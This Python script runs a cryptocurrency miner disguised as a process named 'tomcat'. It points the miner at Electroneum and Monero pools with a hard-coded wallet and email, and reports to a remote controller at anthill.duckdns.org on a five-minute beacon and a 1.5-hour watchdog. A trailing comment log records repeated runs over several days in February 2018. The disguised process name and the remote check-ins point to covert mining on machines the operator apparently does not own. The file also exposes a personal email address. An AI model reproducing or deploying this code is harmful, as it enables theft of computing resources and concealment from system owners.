import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:26:07.268500
#2018-02-17 17:14:04.042677
#2018-02-17 19:03:01.446046
#2018-02-17 20:50:08.227983
#2018-02-17 22:37:03.961597
#2018-02-18 00:21:01.415587
#2018-02-18 02:12:03.600280
#2018-02-18 03:59:07.054626
#2018-02-18 05:47:06.870641
#2018-02-18 07:39:01.419624
#2018-02-18 09:26:01.839262
#2018-02-18 11:11:04.950398
#2018-02-18 12:58:05.775007
#2018-02-18 14:47:07.108570
#2018-02-18 16:36:04.841778
#2018-02-18 18:25:01.662049
#2018-02-18 20:11:07.047596
#2018-02-18 21:57:07.097667
#2018-02-18 23:46:01.653011
#2018-02-19 01:32:06.005469
#2018-02-19 03:20:05.252487
#2018-02-19 05:05:03.555651
#2018-02-19 06:51:05.251795
#2018-02-19 08:40:07.622961
#2018-02-19 10:29:06.614487
#2018-02-19 12:17:06.194762
#2018-02-19 14:04:06.978992
#2018-02-19 15:53:07.300222
#2018-02-19 17:41:06.595527
#2018-02-19 19:29:06.031455
#2018-02-19 21:16:03.957367
#2018-02-19 23:02:01.354091
#2018-02-20 00:47:04.117096
#2018-02-20 02:34:04.895720
#2018-02-20 04:24:02.067334
#2018-02-20 06:08:07.382805
#2018-02-20 07:53:07.386378
#2018-02-20 09:39:06.908572
#2018-02-20 11:23:06.202646
#2018-02-20 13:11:01.306931
#2018-02-20 14:56:06.737692
#2018-02-20 16:42:02.122546
#2018-02-20 18:31:05.402762
#2018-02-20 20:22:06.925128
#2018-02-20 22:09:02.227807
#2018-02-20 23:53:04.889991
#2018-02-21 01:37:06.985793
#2018-02-21 03:24:05.586120
#2018-02-21 05:13:04.881541
#2018-02-21 07:01:05.337509
#2018-02-21 08:47:03.672638
#2018-02-21 10:33:06.421511
#2018-02-21 12:22:01.821167
#2018-02-21 14:09:05.195101
#2018-02-21 15:57:01.776646
#2018-02-21 17:49:11.655445
#2018-02-21 19:36:04.382710
#2018-02-21 21:25:07.910119
#2018-02-21 23:11:05.947738
#2018-02-22 01:02:05.123932
#2018-02-22 02:49:04.004157
#2018-02-22 04:35:09.708822
#2018-02-22 06:20:09.375258
#2018-02-22 08:07:07.516644
#2018-02-22 09:54:01.671723
#2018-02-22 11:39:06.420108
#2018-02-22 13:26:01.935773
#2018-02-22 15:15:07.879768
#2018-02-22 16:59:12.762496
#2018-02-22 18:47:04.165185
#2018-02-22 20:40:08.865073
#2018-02-22 22:27:11.990671
#2018-02-23 00:14:01.658965
#2018-02-23 02:03:03.888549
#2018-02-23 03:51:04.200911
#2018-02-23 05:42:07.770267
#2018-02-23 07:27:06.164901
#2018-02-23 09:34:01.878472
#2018-02-23 11:39:04.162871
#2018-02-23 13:28:09.045526
#2018-02-23 15:14:09.236758
#2018-02-23 17:02:09.891113
#2018-02-23 18:50:06.888255
#2018-02-23 20:35:07.365528
#2018-02-23 22:22:06.088518
#2018-02-24 00:07:05.051464
#2018-02-24 01:57:07.635853
#2018-02-24 03:48:05.867545
#2018-02-24 05:35:06.513341
#2018-02-24 07:21:05.374290
#2018-02-24 09:11:01.679947
#2018-02-24 11:09:01.600858
#2018-02-24 12:57:06.139331
#2018-02-24 14:45:07.382286
#2018-02-24 16:37:02.213957
#2018-02-24 18:25:08.591961
#2018-02-24 20:11:07.517432
#2018-02-24 23:46:07.354454
#2018-02-25 03:38:04.987017
#2018-02-25 07:17:04.097437